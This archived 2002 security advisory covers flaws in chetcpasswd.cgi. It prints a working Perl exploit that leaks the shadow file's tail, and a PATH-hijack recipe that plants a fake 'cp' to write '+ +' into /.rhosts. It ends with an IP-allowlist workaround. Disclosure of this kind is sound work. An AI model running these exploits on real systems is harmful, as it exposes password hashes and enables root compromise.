[UNIX] chetcpasswd.cgi Multiple Vulnerabilities

From: support@securiteam.com
Date: 12/22/02

  • Next message: support@securiteam.com: "[EXPL] Remote Heap malloc/free and Multiple Overflow Vulnerability in WSMP3 (Exploit)" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 22 Dec 2002 12:24:46 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      chetcpasswd.cgi Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://web.onda.com.br/orso/> Chpasswd is a utility allows your users to
    change his/her Squid or Web password using the browser. A lot of
    vulnerabilities have been found allowing remote attackers to get a
    "shadow's tail" without a valid user (Exploit Code Below) and (a possible)
    local exploit to get the root shell.

    DETAILS

    Vulnerable systems:
     * chetcpasswd version 1.2 and earlier

    Exploit:
    If you fill the form with 120 chars in the user field, the system return
    the shadow file's tail without any restriction.
     
    Exploit Code (Remote):
    #!/usr/bin/perl -w
    #Exploit coded by Victor Pereira <vpereira@modulo.com.br>
    #Thanks to Alexandre Vargas And Thiago Zaninotti
    use strict;
    use Socket;
    my ($remote,$port, $iaddr, $paddr,
    $proto,$linha,$query,$len_query,$ARGC,$fakeuser,$linhas,$pattern);
     
    $ARGC=@ARGV;
    if($ARGC < 1){
            print "chetcpasswd.cgi exploit\n";
     print "coded by VP <vpereira\@modulo.com.br>\n";
            print "Usage:$0 <host>\n";
            exit;
    }
    $fakeuser="ASSHOLEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
    $pattern="User: E*E";
     
    $query="user=$fakeuser&old_pw=teste&new_pw1=teste1&new_pw2=teste1&change='Altere minha senha'";
     
    $len_query=length($query);
    $remote = $ARGV[0];
    $port = 80; # random port
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
    die "No port" unless $port;
    $iaddr = inet_aton($remote) || die "no host: $remote";
    $paddr = sockaddr_in($port, $iaddr);
     
    $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
    connect(SOCK, $paddr) || die "connect: $!";
    select(SOCK); $|=1; select(STDOUT);
    print SOCK "POST /cgi-bin/chetcpasswd.cgi HTTP/1.0\n";
    print SOCK "Connection: Keep-Alive\n";
    print SOCK "Content-type: application/x-www-form-urlencoded\n";
    print SOCK "Content-length: $len_query\n";
    print SOCK "\n$query\r\n\r\n";
     
    $linha = "";
    while (<SOCK>) {
     
        $linha = $_;
        if($linha =~ s/<.*?>//g){
             $linha =~ s/$pattern//g;
             print $linha;
    }
    close (SOCK) || die "close: $!";
    exit;
     

    Exploit (Local):
     Reading the source code you can find (lines 229-235) something like this:
    <codigo>
     
          if(ok) {
                   sprintf(command,"cp %s %s",template,pwdfile);
            system(command);
            unlink(template);
            sprintf(Msg,"<font color=blue size=+2>%s %s.",msg18,User);
            Hmsg(Msg, Uid, Gid);
          }
    </codigo>
     

    Well, the code trust in a enviroment variable named PATH, if you create a
    script named "cp", change the value of the PATH variable, then you can via
    WWW interface can exec your cp.
     
    Something like:
     echo "echo + + /.rhosts" > /tmp/cp
     export PATH=/tmp:$PATH

    And then via Web interface you try to change your password.
     
    Workaround:
    From the README:
     
     Create /etc/chetcpasswd.allow file with IP's or sub-nets allowed to use.
     Eg.: 192.168.82.10 - only this IP will use
     192.168.82.0 - IP's from 1 to 255
     192.168.0.0 - ...
     192.0.0.0 - ...
     0.0.0.0 - allow anybody. A bad choice...

    ADDITIONAL INFORMATION

    This information has been provided by <mailto:vpereira@modulo.com.br>
    Victor Pereira.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.